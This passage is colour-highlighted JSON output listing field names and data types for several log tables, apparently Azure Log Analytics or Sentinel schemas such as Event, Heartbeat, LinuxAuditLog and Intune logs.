\u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ETWEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Event\"\u001b[39;49;00m: {\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventCategory\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventLevel\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventLevelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventLog\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ParameterXml\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RenderedDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Source\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Heartbeat\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerEnvironment\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsGatewayInstalled\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSMajorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSMinorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OSType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SCAgentChannel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Solutions\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VMUUID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Version\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"HuntingBookmark\"\u001b[39;49;00m: {\n        \u001b[94m\"BookmarkId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"BookmarkName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"BookmarkType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"LastUpdatedTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Notes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QueryResultRow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QueryText\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SoftDeleted\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UpdatedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"IntuneAuditLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"IntuneOperationalLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"LinuxAuditLog\"\u001b[39;49;00m: {\n        \u001b[94m\"AuditID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ComputerEnvironment\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalAgentIp\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RawRecord\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SerialNumber\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeUploaded\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a0\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a5\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a6\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a7\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a8\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"a9\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"acct\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"addr\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"arch\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"argc\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"audit_user\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"auid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"cmd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"comm\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"cwd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"data\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"effective_group\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"effective_user\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"egid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"euid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"exe\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"exit\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"family\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"filetype\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"gid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"group\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"hostname\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"icmptype\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"key\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"name\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"node\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"op\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"path\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"pid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"ppid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"res\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ses\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"success\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"syscall\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"terminal\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"tty\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"uid\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"user\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"vm\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"McasShadowItReporting\"\u001b[39;49;00m: {\n        \u001b[94m\"AppCategory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppInstance\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppScore\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AppTags\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"BlockedEvents\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DownloadedBytes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EnrichedUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StreamName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TotalBytes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TotalEvents\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UploadedBytes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"UserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Microservices4SpringApplicationLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"AppName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Log\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Stream\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftInsightsAzureActivityLog\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityStatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivitySubstatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Authorization\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Caller\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Claims\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventDataId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSubmissionTimestamp\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"HTTPRequest\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationNameValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProviderValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebApplicationLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CustomLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionClass\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Host\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Logger\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Method\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Source\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Stacktrace\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WebSiteInstanceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebFunctionExecutionLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionDetails\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FunctionInvocationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FunctionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostInstanceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"MicrosoftWebStdOutStdErrLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        